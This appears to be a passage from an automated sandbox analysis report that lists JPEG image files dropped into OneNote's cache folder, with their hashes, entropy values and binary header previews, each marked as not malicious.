File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000005G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000071.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000074.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000076.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000078.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007A.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
